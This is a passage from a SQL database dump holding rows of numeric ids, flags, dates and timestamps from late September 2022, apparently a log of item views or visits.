13:01:57'),(60034,570,1,'2022-09-22','2022-09-22 13:26:23'),(60035,76,1,'2022-09-22','2022-09-22 13:27:16'),(60036,84,1,'2022-09-22','2022-09-22 13:31:24'),(60037,87,1,'2022-09-22','2022-09-22 13:31:56'),(60038,91,1,'2022-09-22','2022-09-22 13:48:56'),(60039,1877,1,'2022-09-22','2022-09-22 13:53:38'),(60040,4738,1,'2022-09-22','2022-09-22 13:56:35'),(60041,1877,1,'2022-09-22','2022-09-22 13:57:14'),(60042,1877,1,'2022-09-22','2022-09-22 13:57:15'),(60043,4944,1,'2022-09-22','2022-09-22 14:13:27'),(60044,470,1,'2022-09-22','2022-09-22 14:14:44'),(60045,3664,1,'2022-09-22','2022-09-22 14:25:31'),(60046,3664,1,'2022-09-22','2022-09-22 14:25:48'),(60047,2609,1,'2022-09-22','2022-09-22 14:25:50'),(60048,1544,1,'2022-09-22','2022-09-22 14:31:32'),(60049,472,1,'2022-09-22','2022-09-22 14:31:34'),(60050,2420,1,'2022-09-22','2022-09-22 15:44:32'),(60051,467,1,'2022-09-22','2022-09-22 16:01:34'),(60052,5101,1,'2022-09-22','2022-09-22 16:11:10'),(60053,4911,1,'2022-09-22','2022-09-22 16:14:34'),(60054,570,1,'2022-09-22','2022-09-22 16:20:24'),(60055,3269,1,'2022-09-22','2022-09-22 16:25:17'),(60056,3045,1,'2022-09-22','2022-09-22 16:49:36'),(60057,4412,1,'2022-09-22','2022-09-22 16:51:50'),(60058,3742,1,'2022-09-22','2022-09-22 17:02:11'),(60059,3742,1,'2022-09-22','2022-09-22 17:02:12'),(60060,5080,1,'2022-09-22','2022-09-22 17:37:18'),(60061,1778,1,'2022-09-22','2022-09-22 17:49:40'),(60062,1778,1,'2022-09-22','2022-09-22 17:49:47'),(60063,76,1,'2022-09-22','2022-09-22 18:05:29'),(60064,76,1,'2022-09-22','2022-09-22 18:05:32'),(60065,2309,1,'2022-09-22','2022-09-22 18:31:48'),(60066,2809,1,'2022-09-22','2022-09-22 18:37:58'),(60067,4776,1,'2022-09-22','2022-09-22 18:53:01'),(60068,4776,1,'2022-09-22','2022-09-22 19:29:10'),(60069,3045,1,'2022-09-22','2022-09-22 20:10:56'),(60070,3674,1,'2022-09-22','2022-09-22 20:27:17'),(60071,1709,1,'2022-09-22','2022-09-22 20:37:55'),(60072,4738,1,'2022-09-22','2022-09-22 20:39:40'),(60073,5119,1,'2022-09-22','2022-09-22 21:30:19'),(60074,4878,1,'2022-09-22','2022-09-22 21:53:03'),(60075,4878,1,'2022-09-22','2022-09-22 21:53:05'),(60076,3249,1,'2022-09-22','2022-09-22 23:02:46'),(60077,3249,1,'2022-09-22','2022-09-22 23:03:09'),(60078,3249,1,'2022-09-22','2022-09-22 23:03:38'),(60079,5042,1,'2022-09-22','2022-09-22 23:31:13'),(60080,1782,1,'2022-09-23','2022-09-23 00:04:20'),(60081,1612,1,'2022-09-23','2022-09-23 00:17:28'),(60082,3307,1,'2022-09-23','2022-09-23 01:02:49'),(60083,1544,1,'2022-09-23','2022-09-23 01:06:44'),(60084,3282,1,'2022-09-23','2022-09-23 01:08:39'),(60085,4963,1,'2022-09-23','2022-09-23 01:15:33'),(60086,467,1,'2022-09-23','2022-09-23 01:51:23'),(60087,472,1,'2022-09-23','2022-09-23 02:00:31'),(60088,472,1,'2022-09-23','2022-09-23 02:00:33'),(60089,4428,1,'2022-09-23','2022-09-23 02:21:20'),(60090,4428,1,'2022-09-23','2022-09-23 02:21:42'),(60091,4457,1,'2022-09-23','2022-09-23 02:52:50'),(60092,91,1,'2022-09-23','2022-09-23 02:53:16'),(60093,4897,1,'2022-09-23','2022-09-23 02:56:23'),(60094,4897,1,'2022-09-23','2022-09-23 02:56:24'),(60095,3307,1,'2022-09-23','2022-09-23 03:43:09'),(60096,2801,1,'2022-09-23','2022-09-23 04:18:25'),(60097,3752,1,'2022-09-23','2022-09-23 04:30:04'),(60098,3752,1,'2022-09-23','2022-09-23 04:30:05'),(60099,80,1,'2022-09-23','2022-09-23 04:53:33'),(60100,4338,1,'2022-09-23','2022-09-23 05:05:25'),(60101,470,1,'2022-09-23','2022-09-23 05:16:58'),(60102,470,1,'2022-09-23','2022-09-23 05:17:00'),(60103,3674,1,'2022-09-23','2022-09-23 06:07:23'),(60104,3674,1,'2022-09-23','2022-09-23 06:07:25'),(60105,2159,1,'2022-09-23','2022-09-23 06:36:25'),(60106,2395,1,'2022-09-23','2022-09-23 07:26:42'),(60107,4485,1,'2022-09-23','2022-09-23 08:50:35'),(60108,3664,1,'2022-09-23','2022-09-23 09:37:39'),(60109,3774,1,'2022-09-23','2022-09-23 09:40:37'),(60110,4485,1,'2022-09-23','2022-09-23 10:20:38'),(60111,4485,1,'2022-09-23','2022-09-23 10:20:45'),(60112,3023,1,'2022-09-23','2022-09-23 10:26:45'),(60113,1877,1,'2022-09-23','2022-09-23 11:10:33'),(60114,4930,1,'2022-09-23','2022-09-23 11:37:55'),(60115,1544,1,'2022-09-23','2022-09-23 11:40:38'),(60116,5125,1,'2022-09-23','2022-09-23 12:01:14'),(60117,467,1,'2022-09-23','2022-09-23 12:03:05'),(60118,467,1,'2022-09-23','2022-09-23 12:03:06'),(60119,5122,1,'2022-09-23','2022-09-23 12:03:12'),(60120,1544,1,'2022-09-23','2022-09-23 12:25:37'),(60121,1544,1,'2022-09-23','2022-09-23 12:25:38'),(60122,5058,1,'2022-09-23','2022-09-23 12:47:01'),(60123,1544,1,'2022-09-23','2022-09-23 12:48:19'),(60124,74,1,'2022-09-23','2022-09-23 12:51:47'),(60125,5128,1,'2022-09-23','2022-09-23 12:56:18'),(60126,5131,1,'2022-09-23','2022-09-23 12:56:56'),(60127,5137,1,'2022-09-23','2022-09-23 12:57:21'),(60128,5134,1,'2022-09-23','2022-09-23 12:58:15'),(60129,2904,1,'2022-09-23','2022-09-23 12:59:39'),(60130,1594,1,'2022-09-23','2022-09-23 13:00:20'),(60131,3102,1,'2022-09-23','2022-09-23 13:37:07'),(60132,1586,1,'2022-09-23','2022-09-23 13:47:56'),(60133,1586,1,'2022-09-23','2022-09-23 13:48:06'),(60134,3102,1,'2022-09-23','2022-09-23 14:48:20'),(60135,2156,1,'2022-09-23','2022-09-23 14:52:24'),(60136,2395,1,'2022-09-23','2022-09-23 15:02:02'),(60137,1594,1,'2022-09-23','2022-09-23 15:02:38'),(60138,76,1,'2022-09-23','2022-09-23 15:03:40'),(60139,1594,1,'2022-09-23','2022-09-23 15:03:46'),(60140,1596,1,'2022-09-23','2022-09-23 15:14:22'),(60141,4966,1,'2022-09-23','2022-09-23 15:37:08'),(60142,1608,1,'2022-09-23','2022-09-23 16:17:44'),(60143,2558,1,'2022-09-23','2022-09-23 16:18:58'),(60144,2617,1,'2022-09-23','2022-09-23 16:19:26'),(60145,2617,1,'2022-09-23','2022-09-23 16:20:15'),(60146,2558,1,'2022-09-23','2022-09-23 16:20:16'),(60147,1608,1,'2022-09-23','2022-09-23 16:20:17'),(60148,4966,1,'2022-09-23','2022-09-23 16:25:42'),(60149,80,1,'2022-09-23','2022-09-23 16:29:20'),(60150,1872,1,'2022-09-23','2022-09-23 16:32:23'),(60151,1872,1,'2022-09-23','2022-09-23 16:32:24'),(60152,4963,1,'2022-09-23','2022-09-23 17:17:11'),(60153,3534,1,'2022-09-23','2022-09-23 17:52:56'),(60154,3534,1,'2022-09-23','2022-09-23 17:52:59'),(60155,1705,1,'2022-09-23','2022-09-23 18:28:57'),(60156,470,1,'2022-09-23','2022-09-23 18:47:07'),(60157,5134,1,'2022-09-23','2022-09-23 19:22:57'),(60158,74,1,'2022-09-23','2022-09-23 19:30:19'),(60159,4520,1,'2022-09-23','2022-09-23 19:39:18'),(60160,2297,1,'2022-09-23','2022-09-23 20:17:35'),(60161,4416,1,'2022-09-23','2022-09-23 21:10:44'),(60162,80,1,'2022-09-23','2022-09-23 21:15:22'),(60163,87,1,'2022-09-23','2022-09-23 21:16:09'),(60164,1598,1,'2022-09-23','2022-09-23 21:49:28'),(60165,1588,1,'2022-09-23','2022-09-23 21:54:13'),(60166,1600,1,'2022-09-23','2022-09-23 22:01:48'),(60167,4457,1,'2022-09-23','2022-09-23 22:08:59'),(60168,4400,1,'2022-09-23','2022-09-23 22:14:01'),(60169,467,1,'2022-09-23','2022-09-23 22:14:49'),(60170,2704,1,'2022-09-23','2022-09-23 22:23:34'),(60171,2152,1,'2022-09-23','2022-09-23 22:41:45'),(60172,1614,1,'2022-09-23','2022-09-23 23:02:04'),(60173,2410,1,'2022-09-23','2022-09-23 23:52:08'),(60174,3789,1,'2022-09-24','2022-09-24 00:40:50'),(60175,4323,1,'2022-09-24','2022-09-24 01:47:58'),(60176,5122,1,'2022-09-24','2022-09-24 02:21:33'),(60177,4323,1,'2022-09-24','2022-09-24 03:17:00'),(60178,108,1,'2022-09-24','2022-09-24 05:28:21'),(60179,5125,1,'2022-09-24','2022-09-24 05:31:29'),(60180,3742,1,'2022-09-24','2022-09-24 07:06:14'),(60181,3482,1,'2022-09-24','2022-09-24 07:06:16'),(60182,3438,1,'2022-09-24','2022-09-24 07:06:18'),(60183,3498,1,'2022-09-24','2022-09-24 07:06:19'),(60184,3430,1,'2022-09-24','2022-09-24 07:06:22'),(60185,467,1,'2022-09-24','2022-09-24 07:24:53'),(60186,467,1,'2022-09-24','2022-09-24 07:25:43'),(60187,5109,1,'2022-09-24','2022-09-24 08:08:10'),(60188,1544,1,'2022-09-24','2022-09-24 08:19:06'),(60189,5116,1,'2022-09-24','2022-09-24 08:47:14'),(60190,1544,1,'2022-09-24','2022-09-24 08:54:54'),(60191,1544,1,'2022-09-24','2022-09-24 08:54:56'),(60192,5113,1,'2022-09-24','2022-09-24 09:26:22'),(60193,4830,1,'2022-09-24','2022-09-24 10:18:19'),(60194,4622,1,'2022-09-24','2022-09-24 10:35:36'),(60195,4622,1,'2022-09-24','2022-09-24 10:35:56'),(60196,2309,1,'2022-09-24','2022-09-24 10:43:12'),(60197,484,1,'2022-09-24','2022-09-24 11:10:20'),(60198,1598,1,'2022-09-24','2022-09-24 11:26:00'),(60199,1737,1,'2022-09-24','2022-09-24 12:19:29'),(60200,1737,1,'2022-09-24','2022-09-24 12:25:02'),(60201,4612,1,'2022-09-24','2022-09-24 12:54:04'),(60202,4612,1,'2022-09-24','2022-09-24 12:54:06'),(60203,4771,1,'2022-09-24','2022-09-24 13:50:30'),(60204,335,1,'2022-09-24','2022-09-24 14:11:40'),(60205,4396,1,'2022-09-24','2022-09-24 14:44:52'),(60206,1544,1,'2022-09-24','2022-09-24 14:55:34'),(60207,2503,1,'2022-09-24','2022-09-24 16:22:37'),(60208,4874,1,'2022-09-24','2022-09-24 16:28:49'),(60209,5122,1,'2022-09-24','2022-09-24 16:29:52'),(60210,4771,1,'2022-09-24','2022-09-24 17:23:08'),(60211,4874,1,'2022-09-24','2022-09-24 17:25:11'),(60212,1598,1,'2022-09-24','2022-09-24 17:29:25'),(60213,1598,1,'2022-09-24','2022-09-24 17:29:27'),(60214,2503,1,'2022-09-24','2022-09-24 17:52:28'),(60215,4930,1,'2022-09-24','2022-09-24 17:53:01'),(60216,84,1,'2022-09-24','2022-09-24 17:53:18'),(60217,76,1,'2022-09-24','2022-09-24 17:55:27'),(60218,91,1,'2022-09-24','2022-09-24 17:55:42'),(60219,89,1,'2022-09-24','2022-09-24 18:04:41'),(60220,89,1,'2022-09-24','2022-09-24 18:05:15'),(60221,89,1,'2022-09-24','2022-09-24 18:05:31'),(60222,89,1,'2022-09-24','2022-09-24 18:05:41'),(60223,1602,1,'2022-09-24','2022-09-24 18:06:16'),(60224,1728,1,'2022-09-24','2022-09-24 18:09:02'),(60225,1728,1,'2022-09-24','2022-09-24 18:09:06'),(60226,89,1,'2022-09-24','2022-09-24 18:10:10'),(60227,87,1,'2022-09-24','2022-09-24 18:14:29'),(60228,488,1,'2022-09-24','2022-09-24 18:16:05'),(60229,487,1,'2022-09-24','2022-09-24 18:16:23'),(60230,486,1,'2022-09-24','2022-09-24 18:16:35'),(60231,91,1,'2022-09-24','2022-09-24 18:17:08'),(60232,4976,1,'2022-09-24','2022-09-24 18:35:29'),(60233,4976,1,'2022-09-24','2022-09-24 18:35:30'),(60234,4976,1,'2022-09-24','2022-09-24 18:48:44'),(60235,4944,1,'2022-09-24','2022-09-24 19:12:41'),(60236,4883,1,'2022-09-24','2022-09-24 19:15:05'),(60237,4883,1,'2022-09-24','2022-09-24 19:15:07'),(60238,1544,1,'2022-09-24','2022-09-24 19:17:08'),(60239,1544,1,'2022-09-24','2022-09-24 19:17:10'),(60240,5125,1,'2022-09-24','2022-09-24 19:28:21'),(60241,4514,1,'2022-09-24','2022-09-24 19:38:44'),(60242,1724,1,'2022-09-24','2022-09-24 20:02:26'),(60243,1724,1,'2022-09-24','2022-09-24 20:03:05'),(60244,1586,1,'2022-09-24','2022-09-24 20:16:48'),(60245,3489,1,'2022-09-24','2022-09-24 20:26:08'),(60246,3489,1,'2022-09-24','2022-09-24 20:26:10'),(60247,3257,1,'2022-09-24','2022-09-24 20:49:47'),(60248,4238,1,'2022-09-24','2022-09-24 21:15:25'),(60249,4888,1,'2022-09-24','2022-09-24 21:48:28'),(60250,84,1,'2022-09-24','2022-09-24 21:49:41'),(60251,1606,1,'2022-09-24','2022-09-24 21:59:20'),(60252,1586,1,'2022-09-24','2022-09-24 22:27:31'),(60253,2309,1,'2022-09-24','2022-09-24 23:01:00'),(60254,4911,1,'2022-09-25','2022-09-25 00:42:23'),(60255,1600,1,'2022-09-25','2022-09-25 01:19:51'),(60256,3777,1,'2022-09-25','2022-09-25 01:34:53'),(60257,4524,1,'2022-09-25','2022-09-25 01:47:23'),(60258,5109,1,'2022-09-25','2022-09-25 02:21:05'),(60259,5109,1,'2022-09-25','2022-09-25 02:48:56'),(60260,5113,1,'2022-09-25','2022-09-25 05:17:51'),(60261,4335,1,'2022-09-25','2022-09-25 05:52:06'),(60262,4448,1,'2022-09-25','2022-09-25 05:58:59'),(60263,74,1,'2022-09-25','2022-09-25 06:01:07'),(60264,74,1,'2022-09-25','2022-09-25 06:01:10'),(60265,1614,1,'2022-09-25','2022-09-25 06:04:05'),(60266,5101,1,'2022-09-25','2022-09-25 06:10:25'),(60267,1602,1,'2022-09-25','2022-09-25 06:49:03'),(60268,1602,1,'2022-09-25','2022-09-25 06:49:03'),(60269,1606,1,'2022-09-25','2022-09-25 07:07:21'),(60270,1606,1,'2022-09-25','2022-09-25 07:07:23'),(60271,1606,1,'2022-09-25','2022-09-25 07:07:25'),(60272,473,1,'2022-09-25','2022-09-25 07:25:45'),(60273,2252,1,'2022-09-25','2022-09-25 07:47:01'),(60274,4639,1,'2022-09-25','2022-09-25 08:27:23'),(60275,1715,1,'2022-09-25','2022-09-25 09:11:36'),(60276,1715,1,'2022-09-25','2022-09-25 09:11:39'),(60277,1766,1,'2022-09-25','2022-09-25 10:15:59'),(60278,1766,1,'2022-09-25','2022-09-25 10:17:10'),(60279,1766,1,'2022-09-25','2022-09-25 10:21:02'),(60280,1766,1,'2022-09-25','2022-09-25 10:27:23'),(60281,1766,1,'2022-09-25','2022-09-25 10:27:32'),(60282,2252,1,'2022-09-25','2022-09-25 10:39:49'),(60283,2395,1,'2022-09-25','2022-09-25 10:40:33'),(60284,2395,1,'2022-09-25','2022-09-25 10:40:35'),(60285,2769,1,'2022-09-25','2022-09-25 12:13:47'),(60286,2769,1,'2022-09-25','2022-09-25 12:13:48'),(60287,4941,1,'2022-09-25','2022-09-25 13:37:13'),(60288,4941,1,'2022-09-25','2022-09-25 13:37:16'),(60289,5137,1,'2022-09-25','2022-09-25 13:57:21'),(60290,3721,1,'2022-09-25','2022-09-25 14:22:11'),(60291,3789,1,'2022-09-25','2022-09-25 15:02:49'),(60292,3789,1,'2022-09-25','2022-09-25 15:02:57'),(60293,108,1,'2022-09-25','2022-09-25 15:12:50'),(60294,1602,1,'2022-09-25','2022-09-25 15:39:15'),(60295,4420,1,'2022-09-25','2022-09-25 18:04:46'),(60296,4420,1,'2022-09-25','2022-09-25 18:15:29'),(60297,474,1,'2022-09-25','2022-09-25 20:02:21'),(60298,474,1,'2022-09-25','2022-09-25 20:02:22'),(60299,1544,1,'2022-09-25','2022-09-25 20:31:21'),(60300,1544,1,'2022-09-25','2022-09-25 20:31:25'),(60301,4960,1,'2022-09-25','2022-09-25 21:21:11'),(60302,4412,1,'2022-09-25','2022-09-25 21:22:44'),(60303,470,1,'2022-09-25','2022-09-25 21:32:20'),(60304,470,1,'2022-09-25','2022-09-25 21:33:04'),(60305,4432,1,'2022-09-25','2022-09-25 22:00:36'),(60306,1594,1,'2022-09-25','2022-09-25 22:23:23'),(60307,1594,1,'2022-09-25','2022-09-25 22:23:24'),(60308,4677,1,'2022-09-25','2022-09-25 23:14:52'),(60309,1774,1,'2022-09-25','2022-09-25 23:20:42'),(60310,2609,1,'2022-09-25','2022-09-25 23:21:28'),(60311,2609,1,'2022-09-25','2022-09-25 23:21:54'),(60312,2609,1,'2022-09-25','2022-09-25 23:22:19'),(60313,2609,1,'2022-09-25','2022-09-25 23:23:09'),(60314,2769,1,'2022-09-25','2022-09-25 23:45:45'),(60315,3092,1,'2022-09-25','2022-09-25 23:57:51'),(60316,3092,1,'2022-09-25','2022-09-25 23:57:53'),(60317,3243,1,'2022-09-26','2022-09-26 00:15:42'),(60318,4792,1,'2022-09-26','2022-09-26 00:40:10'),(60319,4792,1,'2022-09-26','2022-09-26 00:53:43'),(60320,1586,1,'2022-09-26','2022-09-26 01:13:33'),(60321,4338,1,'2022-09-26','2022-09-26 01:48:05'),(60322,4238,1,'2022-09-26','2022-09-26 02:17:58'),(60323,4858,1,'2022-09-26','2022-09-26 03:06:58'),(60324,5131,1,'2022-09-26','2022-09-26 05:18:31'),(60325,1745,1,'2022-09-26','2022-09-26 06:33:09'),(60326,5131,1,'2022-09-26','2022-09-26 06:36:20'),(60327,4416,1,'2022-09-26','2022-09-26 07:34:49'),(60328,5134,1,'2022-09-26','2022-09-26 07:57:56'),(60329,5131,1,'2022-09-26','2022-09-26 07:59:58'),(60330,3107,1,'2022-09-26','2022-09-26 08:05:02'),(60331,3107,1,'2022-09-26','2022-09-26 08:07:01'),(60332,4412,1,'2022-09-26','2022-09-26 08:08:23'),(60333,80,1,'2022-09-26','2022-09-26 08:08:48'),(60334,68,1,'2022-09-26','2022-09-26 08:09:00'),(60335,470,1,'2022-09-26','2022-09-26 08:12:48'),(60336,470,1,'2022-09-26','2022-09-26 08:46:31'),(60337,479,1,'2022-09-26','2022-09-26 09:31:02'),(60338,1604,1,'2022-09-26','2022-09-26 09:44:24'),(60339,1726,1,'2022-09-26','2022-09-26 10:05:40'),(60340,1726,1,'2022-09-26','2022-09-26 10:06:50'),(60341,1726,1,'2022-09-26','2022-09-26 10:07:11'),(60342,1726,1,'2022-09-26','2022-09-26 10:07:39'),(60343,2769,1,'2022-09-26','2022-09-26 10:08:52'),(60344,1724,1,'2022-09-26','2022-09-26 10:13:21'),(60345,1724,1,'2022-09-26','2022-09-26 10:13:45'),(60346,1722,1,'2022-09-26','2022-09-26 10:29:11'),(60347,4444,1,'2022-09-26','2022-09-26 10:29:21'),(60348,2165,1,'2022-09-26','2022-09-26 10:33:19'),(60349,1602,1,'2022-09-26','2022-09-26 10:39:42'),(60350,1602,1,'2022-09-26','2022-09-26 10:39:54'),(60351,74,1,'2022-09-26','2022-09-26 10:40:19'),(60352,4712,1,'2022-09-26','2022-09-26 10:48:10'),(60353,474,1,'2022-09-26','2022-09-26 10:57:46'),(60354,474,1,'2022-09-26','2022-09-26 10:58:55'),(60355,3060,1,'2022-09-26','2022-09-26 11:22:14'),(60356,3060,1,'2022-09-26','2022-09-26 11:22:19'),(60357,5122,1,'2022-09-26','2022-09-26 11:25:10'),(60358,91,1,'2022-09-26','2022-09-26 11:25:27'),(60359,1596,1,'2022-09-26','2022-09-26 11:26:15'),(60360,1596,1,'2022-09-26','2022-09-26 11:26:16'),(60361,4457,1,'2022-09-26','2022-09-26 11:49:54'),(60362,4457,1,'2022-09-26','2022-09-26 12:02:48'),(60363,4457,1,'2022-09-26','2022-09-26 12:04:09'),(60364,4301,1,'2022-09-26','2022-09-26 12:07:13'),(60365,2309,1,'2022-09-26','2022-09-26 12:52:14'),(60366,2309,1,'2022-09-26','2022-09-26 12:52:16'),(60367,4520,1,'2022-09-26','2022-09-26 13:14:44'),(60368,4520,1,'2022-09-26','2022-09-26 13:15:33'),(60369,72,1,'2022-09-26','2022-09-26 14:03:52'),(60370,3041,1,'2022-09-26','2022-09-26 14:37:55'),(60371,1726,1,'2022-09-26','2022-09-26 15:01:27'),(60372,1726,1,'2022-09-26','2022-09-26 15:05:46'),(60373,1726,1,'2022-09-26','2022-09-26 15:08:31'),(60374,1726,1,'2022-09-26','2022-09-26 15:08:38'),(60375,1726,1,'2022-09-26','2022-09-26 15:08:51'),(60376,1726,1,'2022-09-26','2022-09-26 15:09:25'),(60377,1737,1,'2022-09-26','2022-09-26 15:14:17'),(60378,1737,1,'2022-09-26','2022-09-26 15:14:33'),(60379,91,1,'2022-09-26','2022-09-26 15:15:07'),(60380,1737,1,'2022-09-26','2022-09-26 15:15:09'),(60381,335,1,'2022-09-26','2022-09-26 15:17:21'),(60382,5109,1,'2022-09-26','2022-09-26 15:39:22'),(60383,1610,1,'2022-09-26','2022-09-26 16:10:34'),(60384,1610,1,'2022-09-26','2022-09-26 16:10:36'),(60385,4412,1,'2022-09-26','2022-09-26 16:38:36'),(60386,89,1,'2022-09-26','2022-09-26 16:55:32'),(60387,1582,1,'2022-09-26','2022-09-26 16:56:06'),(60388,4996,1,'2022-09-26','2022-09-26 16:57:29'),(60389,5131,1,'2022-09-26','2022-09-26 16:58:40'),(60390,72,1,'2022-09-26','2022-09-26 17:00:46'),(60391,5058,1,'2022-09-26','2022-09-26 17:04:10'),(60392,5058,1,'2022-09-26','2022-09-26 17:05:30'),(60393,4428,1,'2022-09-26','2022-09-26 17:06:59'),(60394,4428,1,'2022-09-26','2022-09-26 17:45:06'),(60395,5116,1,'2022-09-26','2022-09-26 17:57:43'),(60396,5116,1,'2022-09-26','2022-09-26 17:57:45'),(60397,5122,1,'2022-09-26','2022-09-26 19:20:29'),(60398,2804,1,'2022-09-26','2022-09-26 20:03:46'),(60399,5122,1,'2022-09-26','2022-09-26 20:56:49'),(60400,3498,1,'2022-09-26','2022-09-26 21:08:07'),(60401,4520,1,'2022-09-26','2022-09-26 21:33:24'),(60402,4520,1,'2022-09-26','2022-09-26 21:34:07'),(60403,4448,1,'2022-09-26','2022-09-26 21:39:10'),(60404,2809,1,'2022-09-26','2022-09-26 21:42:53'),(60405,1722,1,'2022-09-26','2022-09-26 22:17:35'),(60406,1722,1,'2022-09-26','2022-09-26 22:17:37'),(60407,3280,1,'2022-09-26','2022-09-26 22:52:31'),(60408,2609,1,'2022-09-26','2022-09-26 23:17:05'),(60409,2609,1,'2022-09-26','2022-09-26 23:17:25'),(60410,2609,1,'2022-09-26','2022-09-26 23:17:52'),(60411,2165,1,'2022-09-27','2022-09-27 00:08:56'),(60412,4542,1,'2022-09-27','2022-09-27 00:16:04'),(60413,3285,1,'2022-09-27','2022-09-27 00:39:54'),(60414,1718,1,'2022-09-27','2022-09-27 00:48:27'),(60415,1718,1,'2022-09-27','2022-09-27 00:54:55'),(60416,4738,1,'2022-09-27','2022-09-27 01:18:45'),(60417,4988,1,'2022-09-27','2022-09-27 01:21:51'),(60418,4963,1,'2022-09-27','2022-09-27 01:24:54'),(60419,89,1,'2022-09-27','2022-09-27 01:25:41'),(60420,80,1,'2022-09-27','2022-09-27 01:25:48'),(60421,4963,1,'2022-09-27','2022-09-27 01:25:52'),(60422,4976,1,'2022-09-27','2022-09-27 01:37:17'),(60423,4977,1,'2022-09-27','2022-09-27 01:43:09'),(60424,4753,1,'2022-09-27','2022-09-27 01:46:16'),(60425,4768,1,'2022-09-27','2022-09-27 02:31:26'),(60426,4326,1,'2022-09-27','2022-09-27 02:31:55'),(60427,1701,1,'2022-09-27','2022-09-27 02:38:07'),(60428,4960,1,'2022-09-27','2022-09-27 03:21:29'),(60429,3285,1,'2022-09-27','2022-09-27 03:21:55'),(60430,5116,1,'2022-09-27','2022-09-27 03:28:12'),(60431,2309,1,'2022-09-27','2022-09-27 04:33:54'),(60432,2309,1,'2022-09-27','2022-09-27 04:34:19'),(60433,3727,1,'2022-09-27','2022-09-27 04:41:38'),(60434,2704,1,'2022-09-27','2022-09-27 05:35:11'),(60435,473,1,'2022-09-27','2022-09-27 06:08:47'),(60436,4980,1,'2022-09-27','2022-09-27 06:11:28'),(60437,2420,1,'2022-09-27','2022-09-27 06:17:44'),(60438,4520,1,'2022-09-27','2022-09-27 06:32:07'),(60439,2165,1,'2022-09-27','2022-09-27 06:44:07'),(60440,74,1,'2022-09-27','2022-09-27 07:04:57'),(60441,74,1,'2022-09-27','2022-09-27 07:04:57'),(60442,4556,1,'2022-09-27','2022-09-27 07:05:58'),(60443,4520,1,'2022-09-27','2022-09-27 07:25:06'),(60444,4988,1,'2022-09-27','2022-09-27 07:36:27'),(60445,4960,1,'2022-09-27','2022-09-27 07:55:55'),(60446,1594,1,'2022-09-27','2022-09-27 08:15:17'),(60447,1594,1,'2022-09-27','2022-09-27 08:20:04'),(60448,2609,1,'2022-09-27','2022-09-27 08:40:48'),(60449,468,1,'2022-09-27','2022-09-27 08:50:36'),(60450,487,1,'2022-09-27','2022-09-27 08:54:51'),(60451,1594,1,'2022-09-27','2022-09-27 08:56:31'),(60452,479,1,'2022-09-27','2022-09-27 09:09:20'),(60453,479,1,'2022-09-27','2022-09-27 09:09:51'),(60454,2420,1,'2022-09-27','2022-09-27 09:19:17'),(60455,2813,1,'2022-09-27','2022-09-27 09:27:00'),(60456,2309,1,'2022-09-27','2022-09-27 09:27:18'),(60457,2813,1,'2022-09-27','2022-09-27 09:27:45'),(60458,3253,1,'2022-09-27','2022-09-27 09:28:23'),(60459,80,1,'2022-09-27','2022-09-27 09:32:25'),(60460,470,1,'2022-09-27','2022-09-27 09:47:48'),(60461,1877,1,'2022-09-27','2022-09-27 10:23:37'),(60462,3735,1,'2022-09-27','2022-09-27 10:34:46'),(60463,4759,1,'2022-09-27','2022-09-27 10:34:48'),(60464,3269,1,'2022-09-27','2022-09-27 10:43:01'),(60465,3269,1,'2022-09-27','2022-09-27 10:44:07'),(60466,2297,1,'2022-09-27','2022-09-27 10:44:24'),(60467,474,1,'2022-09-27','2022-09-27 10:45:49'),(60468,4391,1,'2022-09-27','2022-09-27 10:49:01'),(60469,1770,1,'2022-09-27','2022-09-27 10:57:19'),(60470,474,1,'2022-09-27','2022-09-27 11:19:59'),(60471,4983,1,'2022-09-27','2022-09-27 11:47:29'),(60472,1584,1,'2022-09-27','2022-09-27 11:47:44'),(60473,3280,1,'2022-09-27','2022-09-27 11:57:55'),(60474,4963,1,'2022-09-27','2022-09-27 12:21:38'),(60475,570,1,'2022-09-27','2022-09-27 12:39:55'),(60476,1544,1,'2022-09-27','2022-09-27 12:49:47'),(60477,1610,1,'2022-09-27','2022-09-27 12:57:13'),(60478,1608,1,'2022-09-27','2022-09-27 13:33:49'),(60479,1608,1,'2022-09-27','2022-09-27 13:33:50'),(60480,4651,1,'2022-09-27','2022-09-27 13:34:46'),(60481,5005,1,'2022-09-27','2022-09-27 14:56:07'),(60482,4412,1,'2022-09-27','2022-09-27 14:58:25'),(60483,4930,1,'2022-09-27','2022-09-27 15:04:47'),(60484,4776,1,'2022-09-27','2022-09-27 15:05:58'),(60485,2159,1,'2022-09-27','2022-09-27 15:55:18'),(60486,3691,1,'2022-09-27','2022-09-27 15:59:42'),(60487,4911,1,'2022-09-27','2022-09-27 16:32:28'),(60488,3721,1,'2022-09-27','2022-09-27 16:34:02'),(60489,1711,1,'2022-09-27','2022-09-27 16:34:46'),(60490,5101,1,'2022-09-27','2022-09-27 16:37:16'),(60491,3038,1,'2022-09-27','2022-09-27 17:19:48'),(60492,3038,1,'2022-09-27','2022-09-27 17:19:49'),(60493,3104,1,'2022-09-27','2022-09-27 17:49:49'),(60494,1594,1,'2022-09-27','2022-09-27 18:22:49'),(60495,3735,1,'2022-09-27','2022-09-27 18:49:51'),(60496,3735,1,'2022-09-27','2022-09-27 18:49:52'),(60497,3251,1,'2022-09-27','2022-09-27 19:19:47'),(60498,4963,1,'2022-09-27','2022-09-27 19:46:59'),(60499,2775,1,'2022-09-27','2022-09-27 20:00:25'),(60500,2775,1,'2022-09-27','2022-09-27 20:00:55'),(60501,0,1,'2022-09-27','2022-09-27 20:01:02'),(60502,1594,1,'2022-09-27','2022-09-27 21:44:35'),(60503,1722,1,'2022-09-27','2022-09-27 22:37:04'),(60504,1722,1,'2022-09-27','2022-09-27 22:37:36'),(60505,1722,1,'2022-09-27','2022-09-27 22:37:54'),(60506,1722,1,'2022-09-27','2022-09-27 22:38:20'),(60507,1722,1,'2022-09-27','2022-09-27 22:38:39'),(60508,1722,1,'2022-09-27','2022-09-27 22:50:21'),(60509,486,1,'2022-09-27','2022-09-27 23:18:25'),(60510,3498,1,'2022-09-27','2022-09-27 23:35:28'),(60511,1608,1,'2022-09-27','2022-09-27 23:36:10'),(60512,3735,1,'2022-09-27','2022-09-27 23:57:57'),(60513,4416,1,'2022-09-28','2022-09-28 00:19:35'),(60514,1604,1,'2022-09-28','2022-09-28 00:35:17'),(60515,72,1,'2022-09-28','2022-09-28 00:46:40'),(60516,80,1,'2022-09-28','2022-09-28 03:24:08'),(60517,68,1,'2022-09-28','2022-09-28 03:24:13'),(60518,108,1,'2022-09-28','2022-09-28 03:24:17'),(60519,89,1,'2022-09-28','2022-09-28 